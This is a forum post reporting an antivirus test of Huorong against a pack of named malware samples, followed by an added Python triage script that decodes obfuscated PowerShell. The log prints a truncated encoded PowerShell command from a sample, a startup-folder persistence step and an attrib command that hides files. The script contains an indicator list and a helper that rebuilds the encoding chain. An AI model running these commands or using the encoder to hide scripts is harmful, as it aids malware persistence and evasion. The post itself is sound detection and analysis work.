This post was last edited by 不知起什么名 on 2024-4-4 22:42
Huorong
Scan: 4x + heuristic 2x
- Virus database time: 2024-04-04 16:36
- Start time: 2024-04-04 22:25
- Total time: 00:00:01
- Scanned objects: 36
- Scanned files: 11
- Risks found: 4
- Risks handled: 4
- Virus details:
- Risk path: D:\Download\TurtleSUSP-240404\TS-240404-04-Xeno-b5d3fe.exe, virus name: Trojan/MSIL.Agent.dj, virus ID: 9e61267a319f589e, action: handled, file deleted
- Risk path: D:\Download\TurtleSUSP-240404\TS-240404-05-Xeno-bcb4ac.exe, virus name: Trojan/MSIL.Agent.dj, virus ID: 9e61267a319f589e, action: handled, file deleted
- Risk path: D:\Download\TurtleSUSP-240404\TS-240404-01-AgentTesla(PNG)-114bb7.exe, virus name: TrojanSpy/MSIL.AgentTesla.mq, virus ID: ac3cb7ce3931cea3, action: handled, file deleted
- Risk path: D:\Download\TurtleSUSP-240404\TS-240404-07-Redline-70c2f9.exe, virus name: Trojan/Injector.bfs, virus ID: 3f6df37acd8bc223, action: handled, file deleted
- Risk path: D:\Download\TurtleSUSP-240404\TS-240404-08-Snake-8cc9e2.exe, virus name: ADV:TrojanSpy/MSIL.Stealer!meteor, virus ID: 4a7ffd6cc7dd1ce4, action: handled, file deleted
- Risk path: D:\Download\TurtleSUSP-240404\TS-240404-03-AgentTesla(PNG)-051cd4.exe, virus name: ADV:TrojanSpy/MSIL.Stealer!meteor, virus ID: 4a7ffd6cc7dd1ce4, action: handled, file deleted
Double-click: 2x + 1x
- Virus name: Trojan/MSIL.Injector.np
- Virus ID: 2EC8D38D93924346
- Virtual address: 0x000000004F460000
- Image size: 584KB
- Complete image: No
- Data stream hash: 84088dca
- Action: handled
- Process ID: 7268
- Acting process: C:\Users\Administrator\Desktop\TS-240404-02-AgentTesla-2c5266.exe
- Virus name: ADV:Trojan/GenInjector.A!1.27
- Virus path: C:\Users\Administrator\Desktop\TS-240404-02-AgentTesla-2c5266.exe
- Action: handled
- Virus name: Trojan/Agent.bnp
- Virus ID: 73F386FE6AEE34D4
- Virtual address: 0x0000000003230000
- Image size: 436KB
- Complete image: No
- Data stream hash: 9f347948
- Action: handled
- Process ID: 4720
- Acting process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
- Acting process command line: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
- Parent process ID: 1792
- Parent process: C:\Users\Administrator\Desktop\TS-240404-09-Rhadamanthys-d8a319.exe
- Parent process command line: "C:\Users\Administrator\Desktop\TS-240404-09-Rhadamanthys-d8a319.exe"
- Protection item: Suspicious script execution via PowerShell
- Executed file: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- Executed command line: Powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAUQBXAFIAawBMAFYAUgA1AGMARwBVAGcAUQBDAEkATgBDAGkAQQBnAEkAQwBCADEAYwAyAGwAdQBaAHkAQgBUAGUAWABOADAAWgBXADAANwBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABMAGwASgAxAGIAbgBSAHAAYgBXAFUAdQBTAFcANQAwAFoAWABKAHYAYwBGAE4AbABjAG4AWgBwAFkAMgBWAHoATwB3ADAASwBEAFEAbwBnAEkAQwBBAGcAYwBIAFYAaQBiAEcAbABqAEkARwBOAHMAWQBYAE4AegBJAEYAVgB6AFoAWABJAHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFkAbQA5AHYAYgBDAEIAVABhAEcAOQAzAFYAMgBsAHUAWgBHADkAMwBLAEUAbAB1AGQARgBCADAAYwBpAEIAbwBWADIANQBrAEwAQwBCAHAAYgBuAFE
- Action: allowed
- Process ID: 6944
- Acting process: C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat
- Acting process command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat" "
- Protection item: Startup folder (extended protection)
- Target file: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TS-240404-11-PySpy-e466a7.bat
- Action: allowed
- Process ID: 6944
- Acting process: C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat
- Acting process command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat" "
- Protection item: Hiding file attributes
- Executed file: C:\Windows\System32\attrib.exe
- Executed command line: attrib +h +s C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
- Action: blocked
- Process ID: 6944
- Acting process: C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat
- Acting process command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat" "
Remaining samples missed; total 8x + 1x
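The `-Encoded` argument in the PowerShell event above is base64 over UTF-16LE text; its visible prefix decodes to a `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(` wrapper around a JSON object whose `"Script"` field is a second base64 blob, and that inner blob begins with an `Add-Type` declaration of a P/Invoke to `user32.dll!ShowWindow`. The following is an added example, not part of the poster's log or of Huorong: a Python decoder that peels both layers, tolerates the truncation the log field shows (trailing base64 characters cut off), and flags the indicator strings an analyst would look for. The `INNER_SCRIPT` sample is constructed to match the shape of the real payload (the real script's remainder is not on the page and is not reproduced); the function names, the indicator list and the flag-prefix set are this example's own assumptions.

```python
import base64
import binascii
import json
import re
from typing import Optional

# Constructed sample (assumption, not the script from the log): the visible
# prefix of the real payload declares a P/Invoke to user32!ShowWindow, the usual
# way a dropper hides its own console window. Everything after that is invented.
INNER_SCRIPT = (
    'Add-Type @"\r\n'
    '    using System;\r\n'
    '    using System.Runtime.InteropServices;\r\n'
    '    public class User32 {\r\n'
    '        [DllImport("user32.dll")]\r\n'
    '        public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\r\n'
    '    }\r\n'
    '"@\r\n'
)

# Commonly seen spellings of -EncodedCommand (powershell.exe accepts prefixes).
_ENC_FLAGS = {"-encodedcommand", "-encoded", "-enc", "-ec", "-e"}
# A run of base64 alphabet long enough to be a payload rather than an identifier.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Assumed indicator list; extend for your own environment.
INDICATORS = ("Add-Type", "DllImport", "user32.dll", "ShowWindow",
              "FromBase64String", "-ExecutionPolicy Bypass")


def build_encoded_command(script: str) -> str:
    """Rebuild the layering seen in the log: script -> base64 -> JSON {"Script": ...}
    -> PowerShell one-liner -> UTF-16LE -> base64 -> -Encoded argument."""
    inner_b64 = base64.b64encode(script.encode("utf-8")).decode("ascii")
    wrapper = json.dumps({"Script": inner_b64})
    one_liner = ("[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("
                 f"(ConvertFrom-Json '{wrapper}').Script))")
    outer = base64.b64encode(one_liner.encode("utf-16-le")).decode("ascii")
    return ("Powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass "
            f"-Encoded {outer}")


def extract_encoded_arg(cmdline: str) -> Optional[str]:
    """Return the base64 argument that follows an -EncodedCommand style flag, if any."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() in _ENC_FLAGS:
            return toks[i + 1]
    return None


def b64decode_lenient(s: str) -> bytes:
    """Decode base64 that a log field may have truncated: a dangling single
    character carries no complete byte, so drop it, then re-pad; every complete
    leading group still decodes to the exact original bytes."""
    s = re.sub(r"[^A-Za-z0-9+/]", "", s)
    if len(s) % 4 == 1:
        s = s[:-1]
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_powershell_encoded(cmdline: str) -> Optional[str]:
    """First layer: -Encoded is base64 over UTF-16LE text (a stray odd byte from
    truncation is dropped by errors='ignore')."""
    arg = extract_encoded_arg(cmdline)
    if arg is None:
        return None
    return b64decode_lenient(arg).decode("utf-16-le", errors="ignore")


def unwrap_nested_base64(text: str, max_depth: int = 3) -> list:
    """Peel further base64 blobs embedded in the decoded script (here the JSON
    "Script" field); stop when no run decodes to readable text."""
    layers = [text]
    for _ in range(max_depth):
        nxt = None
        for m in _B64_RUN.finditer(layers[-1]):
            try:
                cand = b64decode_lenient(m.group()).decode("utf-8")
            except (UnicodeDecodeError, binascii.Error):
                continue
            if cand.strip() and all(c.isprintable() or c.isspace() for c in cand):
                nxt = cand
                break
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def triage(cmdline: str) -> dict:
    """Decode every layer and report which indicator strings appear in any of them."""
    decoded = decode_powershell_encoded(cmdline)
    layers = [cmdline] + (unwrap_nested_base64(decoded) if decoded else [])
    hits = sorted({ind for ind in INDICATORS
                   for layer in layers if ind.lower() in layer.lower()})
    return {"layers": len(layers), "script": layers[-1], "indicators": hits}


if __name__ == "__main__":
    sample = build_encoded_command(INNER_SCRIPT)
    report = triage(sample)
    print(report["script"])
    print(report["indicators"])
```

To use it on the real event, pass the "Executed command line" string from the log to `triage()`; because the base64 is cut off, only the leading part of the inner script comes back, which is exactly the truncation case the `b64decode_lenient` helper exists for. Note that the log shows this command as "allowed": decoding at triage time is how you decide whether that was a gap.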